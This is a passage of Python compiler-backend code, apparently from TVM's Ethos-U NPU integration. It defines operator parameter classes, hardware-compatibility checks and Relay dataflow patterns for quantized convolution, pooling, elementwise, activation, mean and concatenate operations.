"""This function checks whether padding is within the limits supported by the NPU"""
if len(padding) != 4 or len(bounds) != 4:
return False
top, left, bottom, right = padding
topb, leftb, bottomb, rightb = bounds
return not (top > topb or left > leftb or bottom > bottomb or right > rightb)
def check_pool_shape(pool_shape: tvm.ir.container.Array) -> bool:
if len(pool_shape) != 2:
return False
if pool_shape[1] > 256:
return False
if pool_shape[0] * pool_shape[1] > 256 * 256:
return False
return True
def check_dimensions(tensor: TensorParams):
"""This function checks that the tensor has no more than 4 dimensions"""
return len(tensor.shape) <= 4
class QnnConv2DParams:
"""
This class will parse a Call to a ethosu.qnn_conv2d composite function
and extract quantization information of all the associated tensors.
"""
composite_name = "ethos-u.qnn_conv2d"
# The NPU only supports padding upto the numbers as follows
padding_bounds = [31, 31, 32, 32]
activation_map = {"clip": "CLIP"}
@requires_vela
def __init__(self, func_body: tvm.relay.Function):
from tvm.relay.backend.contrib.ethosu.util import QConv2DArgs # type: ignore
from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
activation = None
separate_padding = None
if str(func_body.op) in self.activation_map.keys():
activation = func_body
requantize_op = activation.args[0]
else:
requantize_op = func_body
bias_add = requantize_op.args[0]
qnn_conv2d = bias_add.args[0]
if isinstance(qnn_conv2d.args[0], relay.Call) and str(qnn_conv2d.args[0].op) == "nn.pad":
separate_padding = qnn_conv2d.args[0]
data_layout = qnn_conv2d.attrs.data_layout
self.kernel_layout = qnn_conv2d.attrs.kernel_layout
# We consider the weights & biases as params as it should be a Constant
self.weights = TensorParams(
qnn_conv2d.args[QConv2DArgs.WEIGHTS.value],
self.kernel_layout,
qnn_conv2d.args[QConv2DArgs.WEIGHTS_SCALE.value],
qnn_conv2d.args[QConv2DArgs.WEIGHTS_ZERO_POINT.value],
)
self.biases = TensorParams(
bias_add.args[BiasAddArgs.BIASES.value],
data_layout,
requantize_op.args[RequantArgs.IFM_SCALE.value],
requantize_op.args[RequantArgs.IFM_ZERO_POINT.value],
)
ifm_tensor = (
separate_padding.args[0] if separate_padding else qnn_conv2d.args[QConv2DArgs.IFM.value]
)
self.ifm = TensorParams(
ifm_tensor,
data_layout,
qnn_conv2d.args[QConv2DArgs.IFM_SCALE.value],
qnn_conv2d.args[QConv2DArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
func_body,
data_layout,
requantize_op.args[RequantArgs.OFM_SCALE.value],
requantize_op.args[RequantArgs.OFM_ZERO_POINT.value],
)
attrs = qnn_conv2d.attrs
pad_value = int(qnn_conv2d.args[QConv2DArgs.IFM_ZERO_POINT.value].data.asnumpy())
self.padding = self.extract_padding(attrs.padding, separate_padding, pad_value)
self.strides = attrs.strides
self.dilation = attrs.dilation
self.activation = activation
self.channels = attrs.channels
# If groups are equal to channel, its a depthwise_conv2d
self.groups = attrs.groups
self.is_depthwise = False
channels_axis = {"HWIO": 3, "HWOI": 2}
if self.groups == self.weights.shape[channels_axis[self.kernel_layout]]:
self.is_depthwise = True
@staticmethod
def extract_padding(
operator_padding: Tuple[int, int, int, int],
separate_padding: relay.Call,
pad_value: int,
) -> Optional[Tuple[int, int, int, int]]:
"""
Convolution operations can sometimes have padding represented as a separate
padding operation before the convolution operation itself. Here we can check
whether these representations can be combined into a single padding attribute
as part of the NPU convolution itself. If the padding specified by the separate
nn.pad operation is not supported, None will be returned. This will cause the
nn.pad to be offloaded separately.
"""
if separate_padding is None:
return operator_padding
if pad_value != int(separate_padding.args[1].data.asnumpy()):
return None
pad_width = separate_padding.attrs["pad_width"]
if len(pad_width) != 4:
return None
if list(pad_width[0]) != [0, 0] or list(pad_width[3]) != [0, 0]:
return None
top, left, bottom, right = operator_padding
return [
top + pad_width[1][0],
left + pad_width[2][0],
bottom + pad_width[1][1],
right + pad_width[2][1],
]
def is_valid(self) -> bool:
"""
This function checks whether QnnConv2D has compatible attributes with the NPU
"""
tensor_params = [self.weights, self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.uint8, np.int8]):
return False
if not check_weights(self.weights, self.dilation):
return False
if not check_bias(self.biases):
return False
if not check_strides(self.strides):
return False
if not check_batch_size(self.ifm):
return False
if not check_dilation(self.dilation):
return False
if not self.padding or not check_padding(self.padding, self.padding_bounds):
return False
legal_groups = [1, self.ofm.shape[3]]
if self.groups not in legal_groups:
return False
# This should be a valid QnnDepthwiseConv2DParams, not QnnConv2DParams
return not self.is_depthwise
class QnnConv2DTransposeParams:
"""
This class will parse a Call to a ethosu.qnn_conv2d_transpose composite
function and extract quantization information of all the associated tensors.
"""
composite_name = "ethos-u.qnn_conv2d_transpose"
# The NPU only supports padding upto the numbers as follows
padding_bounds = [31, 31, 32, 32]
@requires_vela
def __init__(self, func_body: tvm.relay.Function):
from tvm.relay.backend.contrib.ethosu.util import QConv2DTransposeArgs # type: ignore
from tvm.relay.backend.contrib.ethosu.util import BiasAddArgs
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
requantize = func_body
call = func_body.args[0]
if str(call.op) == "nn.bias_add":
bias_add = call
call = call.args[0]
else:
bias_add = None
qnn_conv2d_transpose = call
data_layout = qnn_conv2d_transpose.attrs.data_layout
self.kernel_layout = qnn_conv2d_transpose.attrs.kernel_layout
self.weights = TensorParams(
qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS.value],
self.kernel_layout,
qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS_SCALE.value],
qnn_conv2d_transpose.args[QConv2DTransposeArgs.WEIGHTS_ZERO_POINT.value],
)
self.biases = (
TensorParams(
bias_add.args[BiasAddArgs.BIASES.value],
data_layout,
requantize.args[RequantArgs.IFM_SCALE.value],
requantize.args[RequantArgs.IFM_ZERO_POINT.value],
)
if bias_add
else None
)
self.ifm = TensorParams(
qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM.value],
data_layout,
qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM_SCALE.value],
qnn_conv2d_transpose.args[QConv2DTransposeArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
func_body,
data_layout,
requantize.args[RequantArgs.OFM_SCALE.value],
requantize.args[RequantArgs.OFM_ZERO_POINT.value],
)
attrs = qnn_conv2d_transpose.attrs
self.strides = attrs.strides
self.dilation = attrs.dilation
self.padding = attrs.padding
self.channels = attrs.channels
self.groups = attrs.groups
self.output_padding = attrs.output_padding
kernel_size_map = {
"IOHW": self.weights.shape[2:4],
}
self.kernel_shape = kernel_size_map[str(self.weights.layout)]
# Different padding is used in the legalization from conv2d_transpose
# to conv2d, so we to calculate it here to check that the new size fits
# within the bounds of the NPU before offloading.
pad_top = int(self.kernel_shape[0]) - 1 - int(self.padding[0])
pad_left = int(self.kernel_shape[1]) - 1 - int(self.padding[1])
pad_bottom = int(self.kernel_shape[0]) - 1 - int(self.padding[2])
pad_right = int(self.kernel_shape[1]) - 1 - int(self.padding[3])
if self.strides == [2, 2]:
pad_bottom -= 1
pad_right -= 1
self.legalize_padding = [pad_top, pad_left, pad_bottom, pad_right]
def is_valid(self) -> bool:
"""
This function checks whether QnnConv2D has compatible attributes with the NPU
"""
def check_compatible_output_size(ifm_shape, ofm_shape, padding, strides, kernel_shape):
is_valid_padding = padding == [0, 0, 0, 0]
if is_valid_padding:
expected_height = ifm_shape[1] * strides[0] + (kernel_shape[0] - strides[0])
expected_width = ifm_shape[2] * strides[1] + (kernel_shape[1] - strides[1])
else:
expected_height = ifm_shape[1] * strides[0]
expected_width = ifm_shape[2] * strides[1]
return ofm_shape[1] == expected_height and ofm_shape[2] == expected_width
tensor_params = [self.weights, self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
return False
if not check_weights(self.weights, self.dilation):
return False
if self.biases and not check_bias(self.biases):
return False
if not check_strides(self.strides, stride_range=(2, 2)):
return False
if not check_batch_size(self.ifm):
return False
if not check_dilation(self.dilation, dilation_range=(1, 1)):
return False
if not check_compatible_output_size(
self.ifm.shape,
self.ofm.shape,
[int(x) for x in self.padding],
self.strides,
self.kernel_shape,
):
return False
if not check_padding(self.legalize_padding, self.padding_bounds):
return False
if self.kernel_shape[0] - 2 - int(self.padding[2]) < 0:
return False
if self.kernel_shape[1] - 2 - int(self.padding[3]) < 0:
return False
if self.groups != 1:
return False
if list(self.output_padding) != [0, 0]:
return False
return True
class QnnDepthwiseConv2DParams(QnnConv2DParams):
"""
This class will parse a call to a ethosu.depthwise_conv2d composite function
and extract the parameter information.
"""
composite_name = "ethos-u.depthwise_conv2d"
# The hardware only supports padding upto the numbers as follows
padding_bounds = [31, 31, 32, 32]
def __init__(self, func_body: tvm.relay.expr.Call):
QnnConv2DParams.__init__(self, func_body)
def is_valid(self):
"""
Checks whether QnnDepthwiseConv2D + activation function has compatible attributes with HW
"""
tensor_params = [self.weights, self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.uint8, np.int8]):
return False
if not check_weights(self.weights, self.dilation):
return False
if not check_bias(self.biases):
return False
if not check_strides(self.strides):
return False
if not check_batch_size(self.ifm):
return False
if not check_dilation(self.dilation):
return False
if not self.padding or not check_padding(self.padding, self.padding_bounds):
return False
if self.weights.layout != "HWOI":
return False
# only depth multiplier of size 1 is supported
if self.weights.shape[3] != 1:
return False
if not self.is_depthwise:
return False
return True
def qnn_conv2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.conv2D with optional fused RELU activation.
"""
optional_pad = is_op("nn.pad")(wildcard(), is_constant())
qnn_conv2d = is_op("qnn.conv2d")(
optional_pad | wildcard(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
).has_attr({"kernel_layout": "HWIO"})
bias_add = is_op("nn.bias_add")(qnn_conv2d, is_constant())
req = is_op("qnn.requantize")(
bias_add, is_constant(), is_constant(), is_constant(), is_constant()
)
clip_or_req = req.optional(is_op("clip"))
return clip_or_req
def qnn_depthwise_conv2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for depthwise qnn.conv2D with optional fused RELU activation.
"""
optional_pad = is_op("nn.pad")(wildcard(), is_constant())
qnn_conv2d = is_op("qnn.conv2d")(
optional_pad | wildcard(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
).has_attr({"kernel_layout": "HWOI"})
bias_add = is_op("nn.bias_add")(qnn_conv2d, is_constant())
req = is_op("qnn.requantize")(
bias_add, is_constant(), is_constant(), is_constant(), is_constant()
)
clip_or_req = req.optional(is_op("clip"))
return clip_or_req
def qnn_conv2d_transpose_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.conv2d_transpose.
"""
qnn_conv2d_transpose = is_op("qnn.conv2d_transpose")(
wildcard(), is_constant(), is_constant(), is_constant(), is_constant(), is_constant()
).has_attr({"kernel_layout": "IOHW"})
optional_bias_add = (
is_op("nn.bias_add")(qnn_conv2d_transpose, is_constant()) | qnn_conv2d_transpose
)
req = is_op("qnn.requantize")(
optional_bias_add, is_constant(), is_constant(), is_constant(), is_constant()
)
return req
class MaxPool2DParams:
"""
This class will parse a call to a ethos-u.maxpool2d composite function
and extract the parameter information.
"""
composite_name = "ethos-u.maxpool2d"
# The hardware only supports padding upto the numbers as follows
padding_bounds = [127, 127, 128, 128]
def __init__(self, func_body: Call):
clip = None
if str(func_body.op) == "clip":
clip = func_body
pool_op = clip.args[0]
else:
pool_op = func_body
attrs = pool_op.attrs
self.ifm = TensorParams(pool_op.args[0], attrs.layout)
self.ofm = TensorParams(pool_op, attrs.layout)
self.pool_shape = attrs.pool_size
self.strides = attrs.strides
self.padding = attrs.padding
self.activation = clip
self.pooling_type = "MAX"
def is_valid(self):
"""
This function checks whether MaxPool2D has compatible attributes with the NPU
"""
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.uint8, np.int8]):
return False
if self.ifm.dtype != self.ofm.dtype:
return False
if not check_strides(self.strides):
return False
if not check_batch_size(self.ifm):
return False
if not check_padding(self.padding, self.padding_bounds):
return False
if not check_pool_shape(self.pool_shape):
return False
return True
def qnn_maxpool2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for nn.max_pool2d with optional fused RELU activation.
"""
pattern = is_op("nn.max_pool2d")(wildcard())
pattern = pattern.optional(is_op("clip"))
return pattern
class AvgPool2DParams:
"""
This class will parse a call to a ethos-u.avgpool2d composite function
and extract the parameter information.
"""
composite_name = "ethos-u.avgpool2d"
# The hardware only supports padding upto the numbers as follows
padding_bounds = [127, 127, 128, 128]
def __init__(self, func_body: Call):
clip = None
if str(func_body.op) == "clip":
clip = func_body
cast2 = clip.args[0]
else:
cast2 = func_body
avgpool = cast2.args[0]
cast1 = avgpool.args[0]
attrs = avgpool.attrs
self.ifm = TensorParams(cast1.args[0], attrs.layout)
self.ofm = TensorParams(cast2, attrs.layout)
self.pool_shape = attrs.pool_size
self.strides = attrs.strides
self.padding = attrs.padding
self.activation = clip
self.pooling_type = "AVG"
def is_valid(self):
"""
This function checks whether AvgPool2D has compatible attributes with the NPU
"""
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.uint8, np.int8]):
return False
if self.ifm.dtype != self.ofm.dtype:
return False
if not check_strides(self.strides):
return False
if not check_batch_size(self.ifm):
return False
if not check_padding(self.padding, self.padding_bounds):
return False
if not check_pool_shape(self.pool_shape):
return False
return True
def qnn_avgpool2d_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for nn.avg_pool2d with optional fused RELU activation.
"""
pattern = is_op("cast")(wildcard())
pattern = is_op("nn.avg_pool2d")(pattern)
pattern = is_op("cast")(pattern)
pattern = pattern.optional(is_op("clip"))
return pattern
class BinaryElementwiseParams:
"""
This class will parse a call to a ethosu.binary_elementwise composite function
and extract the parameter information.
"""
def __init__(self, func_body: Call, operator_type: str, is_quantized_operation: bool):
from tvm.relay.backend.contrib.ethosu.util import BinaryElementwiseArgs
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
current_call = func_body
clip = None
requantize = None
if is_quantized_operation:
if str(current_call.op) == "clip":
clip = current_call
current_call = clip.args[0]
else:
if str(current_call.op) == "qnn.requantize":
requantize = current_call
clip = current_call.args[0]
current_call = clip.args[0]
binary_op = current_call
layout = "NHWC"
if is_quantized_operation:
self.ifm = TensorParams(
binary_op.args[BinaryElementwiseArgs.IFM.value],
layout,
binary_op.args[BinaryElementwiseArgs.IFM_SCALE.value],
binary_op.args[BinaryElementwiseArgs.IFM_ZERO_POINT.value],
)
self.ifm2 = TensorParams(
binary_op.args[BinaryElementwiseArgs.IFM2.value],
layout,
binary_op.args[BinaryElementwiseArgs.IFM2_SCALE.value],
binary_op.args[BinaryElementwiseArgs.IFM2_ZERO_POINT.value],
)
self.ofm = TensorParams(
binary_op,
layout,
binary_op.args[BinaryElementwiseArgs.OFM_SCALE.value],
binary_op.args[BinaryElementwiseArgs.OFM_ZERO_POINT.value],
)
else:
self.ifm = TensorParams(
binary_op.args[BinaryElementwiseArgs.IFM.value],
layout,
requantize.args[RequantArgs.IFM_SCALE.value] if requantize else None,
requantize.args[RequantArgs.IFM_ZERO_POINT.value] if requantize else None,
)
self.ifm2 = TensorParams(
binary_op.args[BinaryElementwiseArgs.IFM2.value],
layout,
requantize.args[RequantArgs.IFM_SCALE.value] if requantize else None,
requantize.args[RequantArgs.IFM_ZERO_POINT.value] if requantize else None,
)
self.ofm = TensorParams(
func_body,
layout,
requantize.args[RequantArgs.OFM_SCALE.value] if requantize else None,
requantize.args[RequantArgs.OFM_ZERO_POINT.value] if requantize else None,
)
self.activation = clip
self.operator_type = operator_type
def can_broadcast(ifm, ifm2):
if len(ifm.shape) < len(ifm2.shape):
return False
for m, n in zip(ifm.shape[::-1], ifm2.shape[::-1]):
if m != n and m == 1:
return False
return True
if can_broadcast(self.ifm, self.ifm2):
self.reversed_operands = False
self.valid_broadcast = True
elif can_broadcast(self.ifm2, self.ifm):
self.reversed_operands = True
self.ifm, self.ifm2 = self.ifm2, self.ifm
self.valid_broadcast = True
else:
self.valid_broadcast = False
def is_valid(self):
"""
This function checks whether BinaryElementwise has compatible attributes with the NPU
"""
if np.dtype(self.ofm) == np.int32 and self.activation is not None:
return False
# Due to identity operator requiring ofm != int32 for now
if np.dtype(self.ofm) == np.int32 and len(self.ofm.shape) < 4:
return False
if len(self.ifm.shape) > 4 or len(self.ifm2.shape) > 4:
return False
if len(self.ifm.shape) == 4 and self.ifm.shape[0] != 1:
return False
if len(self.ifm2.shape) == 4 and self.ifm2.shape[0] != 1:
return False
if not self.valid_broadcast:
return False
return True
class AddParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Add composite function
and extract the parameter information.
"""
composite_name = "ethos-u.add"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "ADD", True)
def is_valid(self):
"""
This function checks whether Add has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if not check_valid_dtypes(
[self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8, np.int32]
):
return False
return True
def qnn_add_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.add with optional fused RELU activation.
"""
pattern = is_op("qnn.add")(
wildcard(),
wildcard(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
)
pattern = pattern.optional(is_op("clip"))
return pattern
class SubParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Sub composite function
and extract the parameter information.
"""
composite_name = "ethos-u.sub"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "SUB", True)
def is_valid(self):
"""
This function checks whether Sub has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if not check_valid_dtypes(
[self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8, np.int32]
):
return False
return True
def qnn_subtract_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.subtract with optional fused RELU activation.
"""
pattern = is_op("qnn.subtract")(
wildcard(),
wildcard(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
)
pattern = pattern.optional(is_op("clip"))
return pattern
class MulParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Mul composite function
and extract the parameter information.
"""
composite_name = "ethos-u.mul"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "MUL", True)
def is_valid(self):
"""
This function checks whether Mul has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if not check_valid_dtypes(
[self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8, np.int32]
):
return False
return True
def qnn_mul_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for qnn.mul with optional fused RELU activation.
"""
pattern = is_op("qnn.mul")(
wildcard(),
wildcard(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
is_constant(),
)
pattern = pattern.optional(is_op("clip"))
return pattern
class MinParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Min composite function
and extract the parameter information.
"""
composite_name = "ethos-u.min"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "MIN", False)
def is_valid(self):
"""
This function checks whether Min has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if self.ifm.dtype != self.ifm2.dtype:
return False
if not check_valid_dtypes(
[self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8]
):
return False
return True
def minimum_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for minimum with optional fused RELU activation.
"""
minimum = is_op("minimum")(wildcard(), wildcard())
optional_min_clip = is_op("clip")(minimum)
optional_min_clip = is_op("qnn.requantize")(
optional_min_clip, is_constant(), is_constant(), is_constant(), is_constant()
)
return minimum | optional_min_clip
class MaxParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Max composite function
and extract the parameter information.
"""
composite_name = "ethos-u.max"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "MAX", False)
def is_valid(self):
"""
This function checks whether Max has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if self.ifm.dtype != self.ifm2.dtype:
return False
if not check_valid_dtypes(
[self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.uint8, np.int8]
):
return False
return True
def maximum_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for maximum with optional fused RELU activation.
"""
maximum = is_op("maximum")(wildcard(), wildcard())
optional_max_clip = is_op("clip")(maximum)
optional_max_clip = is_op("qnn.requantize")(
optional_max_clip, is_constant(), is_constant(), is_constant(), is_constant()
)
return maximum | optional_max_clip
class ShlParams(BinaryElementwiseParams):
"""
This class will parse a call to a ethosu.binary_elementwise Shl composite function
and extract the parameter information.
"""
composite_name = "ethos-u.shl"
def __init__(self, func_body: Call):
BinaryElementwiseParams.__init__(self, func_body, "SHL", False)
def is_valid(self):
"""
This function checks whether Shl has compatible attributes with the NPU
"""
if not super().is_valid():
return False
if not check_valid_dtypes([self.ifm, self.ifm2, self.ofm], supported_dtypes=[np.int32]):
return False
return True
def shl_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for left_shift with optional fused RELU activation.
"""
pattern = is_op("left_shift")(wildcard(), wildcard())
pattern = pattern.optional(is_op("clip"))
return pattern
class ReshapeParams:
"""
This class will parse a call to a ethosu.reshape composite function
and extract the parameter information.
"""
composite_name = "ethos-u.reshape"
def __init__(self, func_body: Call):
self.new_shape = func_body.attrs.newshape
self.ifm = TensorParams(func_body.args[0])
self.ofm = TensorParams(func_body)
def is_valid(self):
"""
This function checks whether reshape has compatible attributes with the NPU
"""
if not check_dimensions(self.ifm) or not check_dimensions(self.ofm):
return False
if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
return False
return True
def reshape_pattern():
"""Create pattern for reshape"""
pattern = is_op("reshape")(wildcard())
return pattern
class StridedSliceParams:
"""
This class will parse a call to a ethosu.strided_slice composite function
and extract the parameter information.
"""
composite_name = "ethos-u.strided_slice"
def __init__(self, func_body: Call):
self.ifm = TensorParams(func_body.args[0])
self.ofm = TensorParams(func_body)
attrs = func_body.attrs
# The indices where we begin the slice
self.begin = attrs.begin
# The indices where we end the slice
self.end = attrs.end
self.strides = attrs.strides
self.axes = attrs.axes
self.slice_mode = attrs.slice_mode
def is_valid(self):
"""
This function checks whether reshape has compatible attributes with the NPU
"""
if not check_dimensions(self.ifm) or not check_dimensions(self.ofm):
return False
if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
return False
if len(self.begin) != len(self.end):
return False
for begin_idx, end_idx in zip(self.begin, self.end):
if begin_idx > end_idx:
return False
# Only strides of 1 are supported
if self.strides:
if not all([i == 1 for i in self.strides]):
return False
return True
def strided_slice_pattern():
"""Create pattern for strided_slice"""
pattern = is_op("strided_slice")(wildcard())
return pattern
class AbsParams:
"""
This class will parse a call to a ethosu.unary_elementwise Abs composite function
and extract the parameter information.
"""
composite_name = "ethos-u.abs"
def __init__(self, func_body: Call):
from tvm.relay.backend.contrib.ethosu.util import QuantizeArgs
from tvm.relay.backend.contrib.ethosu.util import DequantizeArgs
quantize = func_body
abs_op = quantize.args[0]
dequantize = abs_op.args[0]
layout = "NHWC"
self.ifm = TensorParams(
dequantize.args[DequantizeArgs.IFM.value],
layout,
dequantize.args[DequantizeArgs.IFM_SCALE.value],
dequantize.args[DequantizeArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
quantize,
layout,
quantize.args[QuantizeArgs.OFM_SCALE.value],
quantize.args[QuantizeArgs.OFM_ZERO_POINT.value],
)
self.operator_type = "ABS"
self.activation = None
def is_valid(self):
"""Checks whether Abs has compatible attributes with HW"""
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8, np.uint8]):
return False
if self.ifm.dtype != self.ofm.dtype:
return False
if not check_dimensions(self.ifm):
return False
if len(self.ifm.shape) == 4 and self.ifm.shape[0] != 1:
return False
if self.ifm.shape != self.ofm.shape:
return False
return True
def abs_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""Create pattern for abs"""
pattern = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
pattern = is_op("abs")(pattern)
pattern = is_op("qnn.quantize")(pattern, is_constant(), is_constant())
return pattern
class LutActivationParams:
"""
A parent class for LUT based activation functions that extract the input and
output tensors and check whether they are valid.
"""
def __init__(self, func_body: Call):
from tvm.relay.backend.contrib.ethosu.util import QuantizeArgs
from tvm.relay.backend.contrib.ethosu.util import DequantizeArgs
layout = "NHWC"
quantize = func_body
activation = quantize.args[0]
dequantize = activation.args[0]
in_var = dequantize.args[0]
self.ifm = TensorParams(
in_var,
layout=layout,
scale=dequantize.args[DequantizeArgs.IFM_SCALE.value],
zero_point=dequantize.args[DequantizeArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
quantize,
layout=layout,
scale=quantize.args[QuantizeArgs.OFM_SCALE.value],
zero_point=quantize.args[QuantizeArgs.OFM_ZERO_POINT.value],
)
def is_valid(self):
"""
This function checks whether activation has compatible attributes with the NPU
"""
if not check_valid_dtypes([self.ifm, self.ofm], supported_dtypes=[np.int8]):
return False
return True
class TanhParams(LutActivationParams):
composite_name = "ethos-u.tanh"
def tanh_pattern():
"""Create pattern for tanh"""
dequant = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
tanh = is_op("tanh")(dequant)
quant = is_op("qnn.quantize")(tanh, is_constant(), is_constant())
return quant
class SigmoidParams(LutActivationParams):
"""
This class will parse a call to a ethos-u.sigmoid composite function
and extract the parameter information.
"""
composite_name = "ethos-u.sigmoid"
def sigmoid_pattern():
"""Create pattern for sigmoid"""
dequant = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
sigmoid = is_op("sigmoid")(dequant)
quant = is_op("qnn.quantize")(sigmoid, is_constant(), is_constant())
return quant
class LeakyReLUParams(LutActivationParams):
"""
This class will parse a call to ethos-u.leaky_relu composite function
and extract the parameter information.
"""
composite_name = "ethos-u.leaky_relu"
def __init__(self, func_body: Call):
super().__init__(func_body)
self.alpha = func_body.args[0].attrs.alpha
def leaky_relu_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for leaky relu.
"""
dequantize = is_op("qnn.dequantize")(wildcard(), is_constant(), is_constant())
leaky_relu = is_op("nn.leaky_relu")(dequantize)
return is_op("qnn.quantize")(leaky_relu, is_constant(), is_constant())
class MeanParams:
"""
This class will parse a call to ethosu.mean composite function
and extract the parameter information.
"""
composite_name = "ethos-u.mean"
def __init__(self, func_body: Call):
from tvm.relay.backend.contrib.ethosu.util import RequantArgs
requantize = func_body
mean_op = requantize.args[0]
attrs = mean_op.attrs
cast = mean_op.args[0]
layout = "NHWC"
self.ifm = TensorParams(
cast.args[0],
layout,
requantize.args[RequantArgs.IFM_SCALE.value],
requantize.args[RequantArgs.IFM_ZERO_POINT.value],
)
self.ofm = TensorParams(
requantize,
layout,
requantize.args[RequantArgs.OFM_SCALE.value],
requantize.args[RequantArgs.OFM_ZERO_POINT.value],
)
ifm_shape = self.ifm.shape
self.height = ifm_shape[0] if len(ifm_shape) in (2, 3) else ifm_shape[1]
self.width = ifm_shape[1] if len(ifm_shape) in (2, 3) else ifm_shape[2]
self.keepdims = attrs.keepdims
self.axis = list(sorted(attrs.axis))
if attrs.exclude:
self.axis = [i for i in range(len(self.ifm.shape)) if i not in self.axis]
def is_valid(self) -> bool:
"""
Checks whether Mean has compatible attributes with HW.
"""
def check_axis(num_dims, axis):
if num_dims in (2, 3):
return axis in ([0], [1], [0, 1])
return axis in ([1], [2], [1, 2])
tensor_params = [self.ifm, self.ofm]
if not check_valid_dtypes(tensor_params, supported_dtypes=[np.int8]):
return False
if self.ifm.dtype != self.ofm.dtype:
return False
if not len(self.ifm.shape) in [2, 3, 4]:
return False
if not check_axis(len(self.ifm.shape), self.axis):
return False
# MEAN has further restrictions on the input size, depending on legalization method.
input_size = self.height * self.width
if input_size > 65536:
return False
if (
self.ifm.q_params.scale_f32 != self.ofm.q_params.scale_f32
or self.ifm.q_params.zero_point != self.ofm.q_params.zero_point
) and input_size > 4096:
return False
if self.axis == [1, 2] and self.keepdims and self.ifm.dtype == "int8" and input_size > 256:
return False
# Large kernel height reshape only when axis is [1, 2]
if self.axis != [1, 2] and self.height > 64:
return False
return True
def mean_pattern() -> tvm.relay.dataflow_pattern.DFPattern:
"""
This function creates the pattern for mean.
"""
pattern = is_op("cast")(wildcard())
pattern = is_op("mean")(pattern)
pattern = is_op("qnn.requantize")(
pattern, is_constant(), is_constant(), is_constant(), is_constant()
)
return pattern
class ConcatParams:
"""
This class will parse a call to a ethos-u.concat composite function
and extract the parameter information.
"""
composite_name = "ethos-u.concat"
def __init__(self, func_body):
self.concat = func_body
self.is_qnn_variant = self.concat.op.name == "qnn.concatenate"
self.input_tensors = [TensorParams(tensor) for tensor in list(func_body.args[0])]
self.axis = func_body.attrs.axis
if self.is_qnn_variant:
self.input_scales = [s.data.asnumpy() for s in list(func_body.args[1])]
self.input_zero_points = [zp.data.asnumpy() for zp in list(func_body.args[2])]
def is_valid(self):
"""Checks whether Concatenate has compatible attributes with the hardware"""
if not check_valid_dtypes(self.input_tensors, supported_dtypes=[np.int8]):
return False
# Check that the scales and zero points of input tensors are the same
if self.is_qnn_variant and not all(self.input_scales == self.input_scales[0]):
return False
